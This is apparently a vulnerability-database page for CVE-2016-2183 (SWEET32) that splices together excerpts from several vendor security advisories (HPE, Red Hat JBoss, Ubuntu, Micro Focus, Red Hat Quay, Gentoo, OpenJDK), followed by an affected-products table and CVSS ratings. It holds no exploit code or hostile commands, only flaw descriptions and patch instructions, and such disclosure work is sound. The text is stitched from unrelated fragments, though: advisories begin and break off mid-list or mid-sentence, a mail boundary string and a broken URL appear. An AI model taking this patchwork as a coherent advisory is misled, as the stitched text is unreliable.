JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch - JH179A HP FlexFabric 5930 4-slot Switch - JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch - JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch + **HSR6600 (Comware 7) - Version: See Mitigation** * HP Network Products - JG353A HP HSR6602-G Router - JG354A HP HSR6602-XG Router - JG776A HP HSR6602-G TAA-compliant Router - JG777A HP HSR6602-XG TAA-compliant Router + **HSR6800 (Comware 7) - Version: See Mitigation** * HP Network Products - JG361A HP HSR6802 Router Chassis - JG361B HP HSR6802 Router Chassis - JG362A HP HSR6804 Router Chassis - JG362B HP HSR6804 Router Chassis - JG363A HP HSR6808 Router Chassis - JG363B HP HSR6808 Router Chassis - JG364A HP HSR6800 RSE-X2 Router Main Processing Unit - JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing - JH075A HP HSR6800 RSE-X3 Router Main Processing Unit + **1950 (Comware 7) - Version: See Mitigation** * HP Network Products - JG960A HP 1950-24G-4XG Switch - JG961A HP 1950-48G-2SFP+-2XGT Switch - JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch - JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch + **7500 (Comware 7) - Version: See Mitigation** * HP Network Products - JD238C HP 7510 Switch Chassis - JD239C HP 7506 Switch Chassis - JD240C HP 7503 Switch Chassis - JD242C HP 7502 Switch Chassis - JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only Main Processing Unit - JH208A HP 7502 Main Processing Unit - JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port 40GbE QSFP+ Main Processing Unit + **5950 (Comware 7) - Version: See Mitigation** * HP Network Products - JH321A HPE FlexFabric 5950 32QSFP28 Switch + **5940 (Comware 7) - Version: See Mitigation** * HP Network Products - JH390A HPE FlexFabric 5940 48SFP+ 6QSFP28 Switch - JH391A HPE FlexFabric 5940 48XGT 6QSFP28 Switch - JH394A HPE FlexFabric 5940 48XGT 6QSFP+ Switch - JH395A HPE FlexFabric 5940 48SFP+ 6QSFP+ Switch - JH396A HPE FlexFabric 5940 32QSFP+ Switch - JH397A HPE FlexFabric 5940 2-slot Switch - JH398A HPE FlexFabric 5940 4-slot Switch HISTORY Version:1 (rev.1) - 6 December 2016 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com. Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX Copyright 2016 Hewlett Packard Enterprise Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Important: Red Hat JBoss Web Server security and bug fix update Advisory ID: RHSA-2017:3113-01 Product: Red Hat JBoss Web Server Advisory URL: https://access.redhat.com/errata/RHSA-2017:3113 Issue date: 2017-11-02 CVE Names: CVE-2016-2183 CVE-2017-12615 CVE-2017-12617 CVE-2017-9788 CVE-2017-9798 ===================================================================== 1. Summary: An update is now available for Red Hat JBoss Enterprise Web Server 2.1.2 for RHEL 6 and Red Hat JBoss Enterprise Web Server 2.1.2 for RHEL 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Relevant releases/architectures: Red Hat JBoss Enterprise Web Server 2 for RHEL 6 Server - i386, noarch, x86_64 Red Hat JBoss Enterprise Web Server 2 for RHEL 7 Server - noarch, x86_64 3. Description: The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server. OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library. Apache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies. This release provides an update to httpd, OpenSSL and Tomcat 6/7 for Red Hat JBoss Web Server 2.1.2. The updates are documented in the Release Notes document linked to in the References. This release of Red Hat JBoss Web Server 2.1.2 Service Pack 2 serves as a update for Red Hat JBoss Web Server 2, and includes bug fixes, which are documented in the Release Notes document linked to in the References. Users of Red Hat JBoss Web Server 2 should upgrade to these updated packages, which resolve several security issues. Security Fix(es): * It was discovered that the httpd's mod_auth_digest module did not properly initialize memory before using it when processing certain headers related to digest authentication. A remote attacker could possibly use this flaw to disclose potentially sensitive information or cause httpd child process to crash by sending specially crafted requests to a server. (CVE-2017-9788) * A vulnerability was discovered in Tomcat where if a servlet context was configured with readonly=false and HTTP PUT requests were allowed, an attacker could upload a JSP file to that context and achieve code execution. (CVE-2017-12615) * A vulnerability was discovered in Tomcat where if a servlet context was configured with readonly=false and HTTP PUT requests were allowed, an attacker could upload a JSP file to that context and achieve code execution. (CVE-2017-12617) * A flaw was found in the way the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite. (CVE-2016-2183) * A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798) Red Hat would like to thank OpenVPN for reporting CVE-2016-2183 and Hanno BAPck for reporting CVE-2017-9798. Upstream acknowledges Karthikeyan Bhargavan (Inria) and GaA<<tan Leurent (Inria) as the original reporters of CVE-2016-2183. Bug Fix(es): * Corruption in nodestatsmem in multiple core dumps but in different functions of each core dump. (BZ#1338640) * mod_cluster segfaults in process_info() due to wrongly generated assembler instruction movslq (BZ#1448709) * CRL checking of very large CRLs fails with OpenSSL 1.0.2 (BZ#1493075) 4. Solution: Before applying the update, back up your existing Red Hat JBoss Web Server installation (including all applications and configuration files). For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted. After installing the updated packages, the httpd daemon will be restarted automatically. 5. Bugs fixed (https://bugzilla.redhat.com/): 1369383 - CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32) 1470748 - CVE-2017-9788 httpd: Uninitialized memory reflection in mod_auth_digest 1490344 - CVE-2017-9798 httpd: Use-after-free by limiting unregistered HTTP method (Optionsbleed) 1493075 - Unable to load large CRL openssl problem 1493220 - CVE-2017-12615 tomcat: Remote Code Execution via JSP Upload 1494283 - CVE-2017-12617 tomcat: Remote Code Execution bypass for CVE-2017-12615 6. Package List: Red Hat JBoss Enterprise Web Server 2 for RHEL 6 Server: Source: httpd-2.2.26-57.ep6.el6.src.rpm jbcs-httpd24-openssl-1.0.2h-14.jbcs.el6.src.rpm mod_cluster-native-1.2.13-9.Final_redhat_2.ep6.el6.src.rpm tomcat6-6.0.41-19_patch_04.ep6.el6.src.rpm tomcat7-7.0.54-28_patch_05.ep6.el6.src.rpm i386: httpd-2.2.26-57.ep6.el6.i386.rpm httpd-debuginfo-2.2.26-57.ep6.el6.i386.rpm httpd-devel-2.2.26-57.ep6.el6.i386.rpm httpd-manual-2.2.26-57.ep6.el6.i386.rpm httpd-tools-2.2.26-57.ep6.el6.i386.rpm jbcs-httpd24-openssl-1.0.2h-14.jbcs.el6.i686.rpm jbcs-httpd24-openssl-debuginfo-1.0.2h-14.jbcs.el6.i686.rpm jbcs-httpd24-openssl-devel-1.0.2h-14.jbcs.el6.i686.rpm jbcs-httpd24-openssl-libs-1.0.2h-14.jbcs.el6.i686.rpm jbcs-httpd24-openssl-perl-1.0.2h-14.jbcs.el6.i686.rpm jbcs-httpd24-openssl-static-1.0.2h-14.jbcs.el6.i686.rpm mod_cluster-native-1.2.13-9.Final_redhat_2.ep6.el6.i386.rpm mod_cluster-native-debuginfo-1.2.13-9.Final_redhat_2.ep6.el6.i386.rpm mod_ldap-2.2.26-57.ep6.el6.i386.rpm mod_ssl-2.2.26-57.ep6.el6.i386.rpm noarch: tomcat6-6.0.41-19_patch_04.ep6.el6.noarch.rpm tomcat6-admin-webapps-6.0.41-19_patch_04.ep6.el6.noarch.rpm tomcat6-docs-webapp-6.0.41-19_patch_04.ep6.el6.noarch.rpm tomcat6-el-2.1-api-6.0.41-19_patch_04.ep6.el6.noarch.rpm tomcat6-javadoc-6.0.41-19_patch_04.ep6.el6.noarch.rpm tomcat6-jsp-2.1-api-6.0.41-19_patch_04.ep6.el6.noarch.rpm tomcat6-lib-6.0.41-19_patch_04.ep6.el6.noarch.rpm tomcat6-log4j-6.0.41-19_patch_04.ep6.el6.noarch.rpm tomcat6-maven-devel-6.0.41-19_patch_04.ep6.el6.noarch.rpm tomcat6-servlet-2.5-api-6.0.41-19_patch_04.ep6.el6.noarch.rpm tomcat6-webapps-6.0.41-19_patch_04.ep6.el6.noarch.rpm tomcat7-7.0.54-28_patch_05.ep6.el6.noarch.rpm tomcat7-admin-webapps-7.0.54-28_patch_05.ep6.el6.noarch.rpm tomcat7-docs-webapp-7.0.54-28_patch_05.ep6.el6.noarch.rpm tomcat7-el-2.2-api-7.0.54-28_patch_05.ep6.el6.noarch.rpm tomcat7-javadoc-7.0.54-28_patch_05.ep6.el6.noarch.rpm tomcat7-jsp-2.2-api-7.0.54-28_patch_05.ep6.el6.noarch.rpm tomcat7-lib-7.0.54-28_patch_05.ep6.el6.noarch.rpm tomcat7-log4j-7.0.54-28_patch_05.ep6.el6.noarch.rpm tomcat7-maven-devel-7.0.54-28_patch_05.ep6.el6.noarch.rpm tomcat7-servlet-3.0-api-7.0.54-28_patch_05.ep6.el6.noarch.rpm tomcat7-webapps-7.0.54-28_patch_05.ep6.el6.noarch.rpm x86_64: httpd-2.2.26-57.ep6.el6.x86_64.rpm httpd-debuginfo-2.2.26-57.ep6.el6.x86_64.rpm httpd-devel-2.2.26-57.ep6.el6.x86_64.rpm httpd-manual-2.2.26-57.ep6.el6.x86_64.rpm httpd-tools-2.2.26-57.ep6.el6.x86_64.rpm jbcs-httpd24-openssl-1.0.2h-14.jbcs.el6.x86_64.rpm jbcs-httpd24-openssl-debuginfo-1.0.2h-14.jbcs.el6.x86_64.rpm jbcs-httpd24-openssl-devel-1.0.2h-14.jbcs.el6.x86_64.rpm jbcs-httpd24-openssl-libs-1.0.2h-14.jbcs.el6.x86_64.rpm jbcs-httpd24-openssl-perl-1.0.2h-14.jbcs.el6.x86_64.rpm jbcs-httpd24-openssl-static-1.0.2h-14.jbcs.el6.x86_64.rpm mod_cluster-native-1.2.13-9.Final_redhat_2.ep6.el6.x86_64.rpm mod_cluster-native-debuginfo-1.2.13-9.Final_redhat_2.ep6.el6.x86_64.rpm mod_ldap-2.2.26-57.ep6.el6.x86_64.rpm mod_ssl-2.2.26-57.ep6.el6.x86_64.rpm Red Hat JBoss Enterprise Web Server 2 for RHEL 7 Server: Source: httpd22-2.2.26-58.ep6.el7.src.rpm jbcs-httpd24-openssl-1.0.2h-14.jbcs.el7.src.rpm mod_cluster-native-1.2.13-9.Final_redhat_2.ep6.el7.src.rpm tomcat6-6.0.41-19_patch_04.ep6.el7.src.rpm tomcat7-7.0.54-28_patch_05.ep6.el7.src.rpm noarch: tomcat6-6.0.41-19_patch_04.ep6.el7.noarch.rpm tomcat6-admin-webapps-6.0.41-19_patch_04.ep6.el7.noarch.rpm tomcat6-docs-webapp-6.0.41-19_patch_04.ep6.el7.noarch.rpm tomcat6-el-2.1-api-6.0.41-19_patch_04.ep6.el7.noarch.rpm tomcat6-javadoc-6.0.41-19_patch_04.ep6.el7.noarch.rpm tomcat6-jsp-2.1-api-6.0.41-19_patch_04.ep6.el7.noarch.rpm tomcat6-lib-6.0.41-19_patch_04.ep6.el7.noarch.rpm tomcat6-log4j-6.0.41-19_patch_04.ep6.el7.noarch.rpm tomcat6-maven-devel-6.0.41-19_patch_04.ep6.el7.noarch.rpm tomcat6-servlet-2.5-api-6.0.41-19_patch_04.ep6.el7.noarch.rpm tomcat6-webapps-6.0.41-19_patch_04.ep6.el7.noarch.rpm tomcat7-7.0.54-28_patch_05.ep6.el7.noarch.rpm tomcat7-admin-webapps-7.0.54-28_patch_05.ep6.el7.noarch.rpm tomcat7-docs-webapp-7.0.54-28_patch_05.ep6.el7.noarch.rpm tomcat7-el-2.2-api-7.0.54-28_patch_05.ep6.el7.noarch.rpm tomcat7-javadoc-7.0.54-28_patch_05.ep6.el7.noarch.rpm tomcat7-jsp-2.2-api-7.0.54-28_patch_05.ep6.el7.noarch.rpm tomcat7-lib-7.0.54-28_patch_05.ep6.el7.noarch.rpm tomcat7-log4j-7.0.54-28_patch_05.ep6.el7.noarch.rpm tomcat7-maven-devel-7.0.54-28_patch_05.ep6.el7.noarch.rpm tomcat7-servlet-3.0-api-7.0.54-28_patch_05.ep6.el7.noarch.rpm tomcat7-webapps-7.0.54-28_patch_05.ep6.el7.noarch.rpm x86_64: httpd22-2.2.26-58.ep6.el7.x86_64.rpm httpd22-debuginfo-2.2.26-58.ep6.el7.x86_64.rpm httpd22-devel-2.2.26-58.ep6.el7.x86_64.rpm httpd22-manual-2.2.26-58.ep6.el7.x86_64.rpm httpd22-tools-2.2.26-58.ep6.el7.x86_64.rpm jbcs-httpd24-openssl-1.0.2h-14.jbcs.el7.x86_64.rpm jbcs-httpd24-openssl-debuginfo-1.0.2h-14.jbcs.el7.x86_64.rpm jbcs-httpd24-openssl-devel-1.0.2h-14.jbcs.el7.x86_64.rpm jbcs-httpd24-openssl-libs-1.0.2h-14.jbcs.el7.x86_64.rpm jbcs-httpd24-openssl-perl-1.0.2h-14.jbcs.el7.x86_64.rpm jbcs-httpd24-openssl-static-1.0.2h-14.jbcs.el7.x86_64.rpm mod_cluster-native-1.2.13-9.Final_redhat_2.ep6.el7.x86_64.rpm mod_cluster-native-debuginfo-1.2.13-9.Final_redhat_2.ep6.el7.x86_64.rpm mod_ldap22-2.2.26-58.ep6.el7.x86_64.rpm mod_ssl22-2.2.26-58.ep6.el7.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2016-2183 https://access.redhat.com/security/cve/CVE-2017-12615 https://access.redhat.com/security/cve/CVE-2017-12617 https://access.redhat.com/security/cve/CVE-2017-9788 https://access.redhat.com/security/cve/CVE-2017-9798 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/articles/3227901 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2017 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD8DBQFZ+28JXlSAg2UNWIIRAuSpAKCFkBoOw+m9aijvXzxKriSHgUoKmACeKRlD egp9FqnDcfyGbgqbKnK0HOk= =5mAC -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ========================================================================== Ubuntu Security Notice USN-3087-1 September 22, 2016 openssl vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 16.04 LTS - Ubuntu 14.04 LTS - Ubuntu 12.04 LTS Summary: Several security issues were fixed in OpenSSL. Software Description: - openssl: Secure Socket Layer (SSL) cryptographic library and tools Details: Shi Lei discovered that OpenSSL incorrectly handled the OCSP Status Request extension. (CVE-2016-6304) Guido Vranken discovered that OpenSSL used undefined behaviour when performing pointer arithmetic. This issue has only been addressed in Ubuntu 16.04 LTS in this update. (CVE-2016-2177) CA(c)sar Pereida, Billy Brumley, and Yuval Yarom discovered that OpenSSL did not properly use constant-time operations when performing DSA signing. A remote attacker could possibly use this issue to perform a cache-timing attack and recover private DSA keys. (CVE-2016-2178) Quan Luo discovered that OpenSSL did not properly restrict the lifetime of queue entries in the DTLS implementation. (CVE-2016-2179) Shi Lei discovered that OpenSSL incorrectly handled memory in the TS_OBJ_print_bio() function. (CVE-2016-2180) It was discovered that the OpenSSL incorrectly handled the DTLS anti-replay feature. (CVE-2016-2181) Shi Lei discovered that OpenSSL incorrectly validated division results. (CVE-2016-2182) Karthik Bhargavan and Gaetan Leurent discovered that the DES and Triple DES ciphers were vulnerable to birthday attacks. This update moves DES from the HIGH cipher list to MEDIUM. (CVE-2016-2183) Shi Lei discovered that OpenSSL incorrectly handled certain ticket lengths. (CVE-2016-6302) Shi Lei discovered that OpenSSL incorrectly handled memory in the MDC2_Update() function. (CVE-2016-6303) Shi Lei discovered that OpenSSL incorrectly performed certain message length checks. (CVE-2016-6306) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 16.04 LTS: libssl1.0.0 1.0.2g-1ubuntu4.4 Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.20 Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.37 After a standard system update you need to reboot your computer to make all the necessary changes. [https://entitlement.microfocus.com/mysoftware/index](https://entitlement.mic ofocus.com/mysoftware/index) HISTORY Version:1 (rev.1) - 12 November 2018 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running Micro Focus products should be applied in accordance with the customer's patch management policy. Please note that you will need to sign in using a Passport account. 3P = 3rd Party Software GN = Micro Focus General Software MU = Multi-Platform Software System management and security procedures must be reviewed frequently to maintain system integrity. Micro Focus is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. "Micro Focus is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected Micro Focus products the important security information contained in this Bulletin. Micro Focus recommends that all users determine the applicability of this information to their individual situations and take appropriate action. Micro Focus does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, Micro Focus will not be responsible for any damages resulting from user's use or disregard of the information provided in this Security Bulletin. To the extent permitted by law, Micro Focus disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement." Copyright 2017 EntIT Software LLC Micro Focus shall not be liable for technical or editorial errors or omissions contained herein. Red Hat Quay is a secure, private container registry that builds, analyzes and distributes container images. It provides a high level of automation and customization. (CVE-2016-2183) Bug Fix(es): * Running Quay in config mode now works in a disconnected option which doesn't require pulling resources from the Internet. * Quay's security scan endpoint is now enabled at startup for viewing results of Clair container image scans. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/): 1369383 - CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32) 1709477 - Quay 3.0.2 errata 5. This is also known as the SWEET32 attack. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201701-65 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Oracle JRE/JDK: Multiple vulnerabilities Date: January 25, 2017 Bugs: #606118 ID: 201701-65 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in Oracle's JRE and JDK software suites, the worst of which may allow execution of arbitrary code Background ========== Java Platform, Standard Edition (Java SE) lets you develop and deploy Java applications on desktops and servers, as well as in today's demanding embedded environments. Java offers the rich user interface, performance, versatility, portability, and security that today's applications require. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-java/oracle-jre-bin < 1.8.0.121 >= 1.8.0.121 2 dev-java/oracle-jdk-bin < 1.8.0.121 >= 1.8.0.121 ------------------------------------------------------------------- 2 affected packages Description =========== Multiple vulnerabilities have been discovered in in Oracle's JRE and JDK. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All Oracle JRE users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=dev-java/oracle-jre-bin-1.8.0.121" All Oracle JDK users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=dev-java/oracle-jdk-bin-1.8.0.121" References ========== [ 1 ] CVE-2016-2183 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2183 [ 2 ] CVE-2016-5546 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5546 [ 3 ] CVE-2016-5547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5547 [ 4 ] CVE-2016-5548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5548 [ 5 ] CVE-2016-5549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5549 [ 6 ] CVE-2016-5552 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5552 [ 7 ] CVE-2016-8328 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-8328 [ 8 ] CVE-2017-3231 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3231 [ 9 ] CVE-2017-3241 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3241 [ 10 ] CVE-2017-3252 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3252 [ 11 ] CVE-2017-3253 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3253 [ 12 ] CVE-2017-3259 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3259 [ 13 ] CVE-2017-3260 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3260 [ 14 ] CVE-2017-3261 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3261 [ 15 ] CVE-2017-3262 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3262 [ 16 ] CVE-2017-3272 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3272 [ 17 ] CVE-2017-3289 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3289 [ 18 ] Oracle Critical Patch Update Advisory - January 2017 http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.ht= ml#AppendixJAVA Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/201701-65 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2017 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 --WTU590MbkrsqL77kX5fo3Ril9tU2ORoki-- . This update moves those algorithms to the legacy algorithm set and causes them to be used only if no non-legacy algorithms can be negotiated. (CVE-2016-2183) It was discovered that OpenJDK accepted ECSDA signatures using non-canonical DER encoding. (CVE-2016-5546) It was discovered that covert timing channel vulnerabilities existed in the DSA implementations in OpenJDK. (CVE-2016-5548) It was discovered that the URLStreamHandler class in OpenJDK did not properly parse user information from a URL. (CVE-2016-5552) It was discovered that the URLClassLoader class in OpenJDK did not properly check access control context when downloading class files. (CVE-2017-3231) It was discovered that the Remote Method Invocation (RMI) implementation in OpenJDK performed deserialization of untrusted inputs. (CVE-2017-3241) It was discovered that the Java Authentication and Authorization Service (JAAS) component of OpenJDK did not properly perform user search LDAP queries. An attacker could use a specially constructed LDAP entry to expose or modify sensitive information. (CVE-2017-3252) It was discovered that the PNGImageReader class in OpenJDK did not properly handle iTXt and zTXt chunks. (CVE-2017-3253) It was discovered that integer overflows existed in the SocketInputStream and SocketOutputStream classes of OpenJDK. (CVE-2017-3261) It was discovered that the atomic field updaters in the java.util.concurrent.atomic package in OpenJDK did not properly restrict access to protected field members. An attacker could use this to specially craft a Java application or applet that could bypass Java sandbox restrictions

Trust: 1.89

sources: NVD: CVE-2016-2183 // VULHUB: VHN-91002 // VULMON: CVE-2016-2183 // PACKETSTORM: 142756 // PACKETSTORM: 140084 // PACKETSTORM: 144869 // PACKETSTORM: 138820 // PACKETSTORM: 150303 // PACKETSTORM: 152978 // PACKETSTORM: 143970 // PACKETSTORM: 140725 // PACKETSTORM: 141111

AFFECTED PRODUCTS

vendor:	redhat	model:	enterprise linux	scope:	eq	version:	7.0	Trust: 1.0
vendor:	python	model:	python	scope:	gte	version:	2.7.0	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1p	Trust: 1.0
vendor:	redhat	model:	enterprise linux	scope:	eq	version:	6.0	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1f	Trust: 1.0
vendor:	cisco	model:	content security management appliance	scope:	eq	version:	9.7.0-006	Trust: 1.0
vendor:	nodejs	model:	node.js	scope:	gte	version:	6.0.0	Trust: 1.0
vendor:	nodejs	model:	node.js	scope:	gte	version:	0.10.0	Trust: 1.0
vendor:	redhat	model:	jboss web server	scope:	eq	version:	3.0	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1l	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1d	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1c	Trust: 1.0
vendor:	python	model:	python	scope:	lt	version:	3.4.7	Trust: 1.0
vendor:	redhat	model:	enterprise linux	scope:	eq	version:	5.0	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.2d	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1g	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.2b	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.2c	Trust: 1.0
vendor:	python	model:	python	scope:	lt	version:	2.7.13	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1q	Trust: 1.0
vendor:	nodejs	model:	node.js	scope:	lt	version:	0.10.47	Trust: 1.0
vendor:	oracle	model:	database	scope:	eq	version:	11.2.0.4	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1t	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.2e	Trust: 1.0
vendor:	nodejs	model:	node.js	scope:	lt	version:	4.1.2	Trust: 1.0
vendor:	cisco	model:	content security management appliance	scope:	eq	version:	9.6.6-068	Trust: 1.0
vendor:	nodejs	model:	node.js	scope:	gte	version:	4.0.0	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1b	Trust: 1.0
vendor:	redhat	model:	jboss enterprise application platform	scope:	eq	version:	6.0.0	Trust: 1.0
vendor:	nodejs	model:	node.js	scope:	lt	version:	0.12.16	Trust: 1.0
vendor:	python	model:	python	scope:	gte	version:	3.4.0	Trust: 1.0
vendor:	nodejs	model:	node.js	scope:	gte	version:	0.12.0	Trust: 1.0
vendor:	python	model:	python	scope:	gte	version:	3.5.0	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.2h	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1h	Trust: 1.0
vendor:	nodejs	model:	node.js	scope:	lt	version:	4.6.0	Trust: 1.0
vendor:	nodejs	model:	node.js	scope:	gte	version:	4.2.0	Trust: 1.0
vendor:	nodejs	model:	node.js	scope:	lt	version:	6.7.0	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1j	Trust: 1.0
vendor:	oracle	model:	database	scope:	eq	version:	12.1.0.2	Trust: 1.0
vendor:	redhat	model:	jboss enterprise web server	scope:	eq	version:	2.0.0	Trust: 1.0
vendor:	python	model:	python	scope:	lt	version:	3.5.3	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1o	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1e	Trust: 1.0
vendor:	redhat	model:	jboss enterprise web server	scope:	eq	version:	1.0.0	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1a	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.2f	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1i	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1r	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1k	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1n	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.2a	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1m	Trust: 1.0

sources: NVD: CVE-2016-2183

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2016-2183
value:	HIGH
Trust: 1.0
VULHUB:	VHN-91002
value:	MEDIUM
Trust: 0.1
VULMON:	CVE-2016-2183
value:	MEDIUM
